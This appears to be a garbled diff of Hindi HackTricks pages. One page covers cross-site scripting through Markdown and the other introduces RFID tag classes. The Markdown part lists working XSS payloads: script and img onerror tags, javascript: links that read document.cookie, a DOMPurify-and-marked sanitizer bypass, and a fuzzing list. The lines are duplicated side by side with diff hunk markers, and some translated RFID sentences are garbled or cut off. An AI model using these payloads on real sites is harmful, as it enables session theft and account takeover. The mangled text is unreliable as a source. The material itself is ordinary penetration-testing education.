मार्कडाउन में XSS प्राप्त करने का सबसे सामान्य तरीका है सामान्य HTML टैग्स को संशोधित करना जो जावास्क्रिप्ट को निष्पादित करते हैं, क्योंकि कई मार्कडाउन व्याख्याकर्ता HTML को भी स्वीकार करेंगे। मार्कडाउन में XSS प्राप्त करने का सबसे सामान्य तरीका सामान्य HTML टैग इंजेक्ट करना है जो जावास्क्रिप्ट को क्रियान्वित करते हैं, क्योंकि कई मार्कडाउन इंटरप्रीटर्स भी HTML को स्वीकार करेंगे।
```html ```html
<!-- XSS with regular tags --> <!-- XSS with regular tags -->
<script>alert(1)</script> <script>alert(1)</script>
<img src=x onerror=alert(1) /> <img src=x onerror=alert(1) />
``` ```
आप [hacktricks](./) के मुख्य XSS पेज में और उदाहरण ढूंढ सकते हैं। आप [hacktricks के मुख्य XSS पृष्ठ](./) में अधिक उदाहरण पा सकते हैं।
### जावास्क्रिप्ट लिंक ### जावास्क्रिप्ट लिंक
यदि HTML टैग विकल्प नहीं हैं तो आप हमेशा मार्कडाउन सिंटेक्स के साथ खेलने की कोशिश कर सकते हैं: यदि HTML टैग एक विकल्प नहीं हैं तो आप हमेशा मार्कडाउन सिंटेक्स के साथ खेलने की कोशिश कर सकते हैं:
```html ```html
<!-- markdow link to XSS, this usually always work but it requires interaction --> <!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie)) [a](javascript:prompt(document.cookie))
@ -41,45 +41,18 @@
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201) [a](javascript:window.onerror=alert;throw%201)
``` ```
### इमेज इवेंट सिंटेक्स का दुरुपयोग ### Img घटना विधि दुरुपयोग
The `img` tag in HTML allows us to display images on a webpage. However, it can also be abused to execute malicious code if proper input validation and sanitization are not implemented.
एचटीएमएल में `img` टैग हमें वेबपेज पर छवियाँ प्रदर्शित करने की अनुमति देता है। हालांकि, यदि सही इनपुट मान्यता और सेनिटाइज़ेशन नहीं की जाती है, तो यह दुर्भाग्यपूर्ण कोड को निष्पादित करने के लिए दुरुपयोग किया जा सकता है।
The `img` tag has an `onerror` event attribute that is triggered when the image fails to load. This attribute can be exploited to execute arbitrary JavaScript code.
`img` टैग में `onerror` घटना गुणांक होता है जब छवि लोड नहीं हो पाती है। इस गुणांक का दुरुपयोग करके विचित्र जावास्क्रिप्ट कोड को निष्पादित किया जा सकता है।
To exploit this, an attacker can inject JavaScript code into the `src` attribute of the `img` tag and use the `onerror` event to execute the injected code.
इसे शोषण करने के लिए, हमलावर एक जावास्क्रिप्ट कोड को `img` टैग के `src` गुणांक में संप्रेषित कर सकता है और `onerror` घटना का उपयोग करके संप्रेषित कोड को निष्पादित कर सकता है।
For example, the following code snippet demonstrates an XSS attack using the `onerror` event:
उदाहरण के लिए, निम्नलिखित कोड टुकड़ा `onerror` घटना का उपयोग करके एक XSS हमला दिखाता है:
```html
<img src="nonexistent-image.jpg" onerror="alert('XSS Attack!');" />
```
When the image fails to load, the `onerror` event is triggered, executing the JavaScript code `alert('XSS Attack!');`. This code will display an alert box with the message "XSS Attack!".
जब छवि लोड नहीं हो पाती है, तो `onerror` घटना ट्रिगर होती है और जावास्क्रिप्ट कोड `alert('XSS Attack!');` को निष्पादित करती है। यह कोड "XSS हमला!" संदेश के साथ एक चेतावनी बॉक्स प्रदर्शित करेगा।
To prevent this type of attack, it is important to properly validate and sanitize user input, especially when it is used to construct dynamic HTML content.
इस प्रकार के हमले से बचने के लिए, उपयोगकर्ता इनपुट की सही मान्यता और सेनिटाइज़ेशन करना महत्वपूर्ण है, खासकर जब यह डायनामिक एचटीएमएल सामग्री का निर्माण करने के लिए उपयोग किया जाता है।
```markdown ```markdown
![Uh oh...]("onerror="alert('XSS')) ![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS')) ![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad')) ![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError')) ![Escape SRC - onerror]("onerror="alert('ImageOnError'))
``` ```
### HTML सैनिटाइजर मार्कडाउन बाइपास ### HTML सेनिटाइज़र मार्कडाउन बायपास
निम्नलिखित कोड **HTML इनपुट को सैनिटाइज** कर रहा है और फिर इसे **मार्कडाउन पार्सर को पास कर रहा है**, इसके बाद, XSS को Markdown और DOMPurify के बीच गलत-समझ के द्वारा ट्रिगर किया जा सकता है। निम्नलिखित कोड **HTML इनपुट को सेनिटाइज़ कर रहा है** और फिर **इसे मार्कडाउन पार्सर को पारित कर रहा है**, इसके बाद, XSS को Markdown और DOMPurify के बीच के गलत-समझ का शिकार करके ट्रिगर किया जा सकता है।
```html ```html
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script> <script>
@ -106,8 +79,6 @@ document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
`<p x="`<img src=x onerror=alert(1)>"></p> `<p x="`<img src=x onerror=alert(1)>"></p>
``` ```
### फज़िंग ### फज़िंग
फज़िंग एक अभ्यास है जिसमें आप अनुप्रयोगों को अनुकरण करने के लिए असंभावित या अनुप्रयोगित मानचित्रों का उपयोग करते हैं। यह एक प्रभावी तकनीक है जो आपको अनुप्रयोगों में संभावित सुरक्षा दुरुपयोगों की खोज करने में मदद कर सकती है। फज़िंग का उपयोग करके, आप अनुप्रयोगों के विभिन्न भागों को अद्यतित करने और उनमें असंभावित या अनुप्रयोगित इनपुट द्वारा उत्पन्न होने वाली संभावित सुरक्षा दुरुपयोगों को खोजने के लिए विभिन्न प्रकार के इनपुट डेटा का उपयोग कर सकते हैं। यह आपको अनुप्रयोगों की सुरक्षा को मजबूत करने और संभावित दुरुपयोगों को पहचानने में मदद कर सकता है।
```html ```html
<!-- <!--
Fuzzing examples from Fuzzing examples from
@ -132,7 +103,7 @@ Fuzzing examples from
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) [notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain)) [clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/ओह%20नहीं!/.source));return(false);// _http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>> <http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ") [text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1)) [a](javascript:this;alert(1))
@ -187,10 +158,10 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।** * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -2,55 +2,45 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की इच्छा रखते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में देखना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपना योगदान दें।** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में**
</details> </details>
## परिचय ## परिचय
**रेडियो फ्रिक्वेंसी आईडेंटिफिकेशन (RFID)** सबसे लोकप्रिय शॉर्ट-रेंज रेडियो समाधान है। यह आमतौर पर एक इकाई की पहचान करने वाली जानकारी को संग्रहीत और प्रसारित करने के लिए उपयोग किया जाता है। **रेडियो फ्रक्वेंसी आईडेंटिफिकेशन (RFID)** सबसे लोकप्रिय शॉर्ट-रेंज रेडियो समाधान है। यह आम तौर पर किसी एंटिटी की पहचान करने वाली जानकारी को स्टोर और ट्रांसमिट करने के लिए उपयोग किया जाता है।
एक RFID टैग **अपनी स्वयं की शक्ति स्रोत (सक्रिय)** पर निर्भर कर सकता है, जैसे कि एक एम्बेडेड बैटरी, या पठन एंटीना से अपनी शक्ति प्राप्त कर सकता है जो प्राप्त रेडियो तरंगों से उत्पन्न धारा का उपयोग करती है (**निष्क्रिय**). एक RFID टैग **अपने व्यावसायिक बैटरी** जैसे **अपने विद्युत स्रोत (सक्रिय)** पर निर्भर कर सकता है, या पठन एंटीना से अपनी शक्ति प्राप्त कर सकता है जो प्राप्त रेडियो तरंगों से **उत्प्रेरित धरती वर्तनी** का उपयोग करता है (**निष्क्रिय**).
### वर्ग ### वर्ग
EPCglobal ने RFID टैगों को छः श्रेणियों में विभाजित किया है। प्रत्येक श्रेणी में एक टैग के पास पिछली श्रेणी में सूचीबद्ध सभी क्षमताएं होती हैं, जिससे यह पिछली श्रेणी के साथ संगत हो जाता है। EPCglobal ने RFID टैगों को छः श्रेणियों में विभाजित किया है। प्रत्येक श्रेणी में एक टैग में पिछली श्रेणी में सूचीत सभी क्षमताएँ होती हैं, जिससे यह पिछले संगणक में संग्रहित जानकारी को बदला नहीं जा सकता है।
* **कक्षा 0** टैग **निष्क्रिय** टैग होते हैं जो **UHF** बैंड में कार्य करते हैं। विक्रेता उन्हें उत्पादन कारख़ाने में पूर्व-प्रोग्राम करता है। इसलिए, उनकी मेमोरी में संग्रहित जानकारी को आप **बदल नहीं सकते** * **कक्षा 0** टैग **निष्क्रिय** टैग होते हैं जो **UHF** बैंड में का करते हैं। विक्रेता उन्हें उत्पादन कारख़ाने में **पूर्व-कार्यकृत** करता है। इसके परिणामस्वरूप, आप उनकी मेमोरी में स्टोर की गई जानकारी को **बदल नहीं** सकते
* **कक्षा 1** टैग एचएफ बैंड में भी कार्य कर सकते हैं। इसके अलावा, इन्हें उत्पादन के बाद केवल एक बार **लिखा जा सकता है**। कई कक्षा 1 टैग उनके प्राप्त करने वाले कमांडों के **साइक्लिक रेडंडेंसी चेक्स** (CRC) को प्रोसेस कर सकते हैं। CRC त्रुटि का पता लगाने के लिए कमांडों के अंत में कुछ अतिरिक्त बाइट्स होते हैं। * **कक्षा 1** टैग एचएफ बैंड में भी काम कर सकते हैं। साथ ही, उन्हें उत्पादन के बाद केवल एक बार **लिखा जा सकता है**। कई कक्षा 1 टैग उनके प्राप्त किए गए कमांडों के **साइक्लिक रेडंडेंसी चेक्स** (CRCs) को प्रोसेस कर सकते हैं। CRCs त्रुटि का पता लगाने के लिए कमांडों के अंत में कुछ अतिरिक्त बाइट्स होते हैं।
* **कक्षा 2** टैग को **एकाधिक बार लिखा जा सकता है** * **कक्षा 2** टैग **एकाधिक बार लिखा जा सकता है**
* **कक्षा 3** टैग में **एम्बेडेड सेंसर** हो सकते हैं जो मौसमी पैरामीटर, जैसे मौजूदा तापमान या टैग की गति, को रिकॉर्ड कर सकते हैं। ये टैग **अर्ध-निष्क्रिय** होते हैं, क्योंकि इनमें एक एम्बेडेड **बैटरी** जैसे एक एकीकृत शक्ति स्रोत होता है, लेकिन वे अन्य टैग या पाठकों के साथ वायरलेस संचार **प्रारंभ नहीं कर सकते** हैं * **कक्षा 3** टैग में **एम्बेडेड सेंसर** हो सकते हैं जो पर्यावरणीय पैरामीटर्स जैसे वर्तमान तापमान या टैग की गति को रिकॉर्ड कर सकते हैं। ये टैग **अर्ध-निष्क्रिय** होते हैं, क्योंकि हालांकि उनके पास एक एम्बेडेड **बैटरी** जैसे एक एम्बेडेड शक्ति स्रोत होता है, वे अन्य टैग या रीडर्स के साथ वायरलेस **संचार** को **प्रारंभ नहीं** कर सकते
* **कक्षा 4** टैग इसी कक्षा के अन * **कक्षा 4** टैग इसी कक्षा के अन्य टैगों के साथ संवाद आरंभ कर सकते हैं, जिससे वे **सक्रिय टैग** बन जाते हैं।
### हमला * **कक्षा 5** टैग अन्य टैगों को शक्ति प्रदान कर सकते हैं और सभी पिछले टैग कक्षाओं के साथ संवाद कर सकते हैं। कक्षा 5 टैग RFID रीडर के रूप में काम कर सकते हैं।
आप **फ्लिपर जीरो के साथ इन टैग्स पर हमला कर सकते हैं**: ### RFID टैग में स्टोर की गई जानकारी
{% content-ref url="../todo/radio-hacking/flipper-zero/fz-125khz-rfid.md" %} एक RFID टैग की मेमोरी आम तौर पर चार प्रकार की जानकारी स्टोर करती है: **पहचान डेटा**, जो टैग से जुड़ी **एंटिटी की पहचान करती है** (इस डेटा में उपयोगकर्ता-निर्धारित क्षेत्र शामिल हैं, जैसे बैंक खाते); **सहायक डेटा**, जो एंटिटी के बारे में **अधिक विवरण** प्रदान करती है; **नियंत्रण डेटा**, टैग के आंतरिक **कॉन्फ़िगरेशन** के लिए उपयोग किया जाता है; और टैग की **निर्माता डेटा**, जिसमें एक टैग का अद्वितीय पहचानकर्ता (**UID**) और टैग के **उत्पादन**, **प्रकार**, और **विक्रेता** के बारे में विवरण होता है। आपको व्यावसायिक टैगों में पहले दो प्रकार की डेटा मिलेगी; अंतिम दो टैग के विक्रेता के आधार पर भिन्न हो सकते हैं।
[fz-125khz-rfid.md](../todo/radio-hacking/flipper-zero/fz-125khz-rfid.md)
{% endcontent-ref %}
## हाई-फ्रीक्वेंसी RFID टैग (13.56 MHz) ISO मानक निर्दिष्ट करता है **एप्लिकेशन फैमिली आईडेंटिफायर (AFI)** मूल्य, एक कोड जो टैग किस प्रकार की वस्तु से संबंधित है दर्शाता है। एक और महत्वपूर्ण रजिस्टर, जिसे भी ISO द्वारा निर्दिष्ट किया गया है, डेटा स्टोरेज फॉर्मेट आईडेंटिफायर (**DSFID**), जो उपयोगकर्ता डेटा की **तार्किक संगठन** को परिभाषित करता है।
**हाई-फ्रीक्वेंसी टैग** का उपयोग एक अधिक जटिल रीडर-टैग इंटरेक्शन के लिए किया जाता है जब आपको क्रिप्टोग्राफी, एक बड़े दो-तरफ़ा डेटा ट्रांसफर, प्रमाणीकरण, आदि की आवश्यकता होती है।\ अधिकांश RFID **सुरक्षा नियंत्रण** मेमोरी में स्थित डेटा का उपयोग करते हैं जो प्रत्येक उपयोगकर्ता मेमोरी ब्लॉक और AFI और DSFID मान वाले विशेष रजिस्टर पर **पठन** या **लेखन** कार्रवाई को **प्रतिबंधित** करते हैं। ये **लॉक** **मेकेनिज़म** नियंत्रण मेमोरी में स्टोर किए गए डेटा का उपयोग करते हैं और विक्रेता द्वारा पूर्व-कॉन्फ़िगर किए गए **डिफ़ॉल्ट पासवर्ड** होते हैं लेकिन टैग मालिकों को **कस्टम पासवर्ड कॉन्फ़िगर** करने की अनुमति देते हैं।
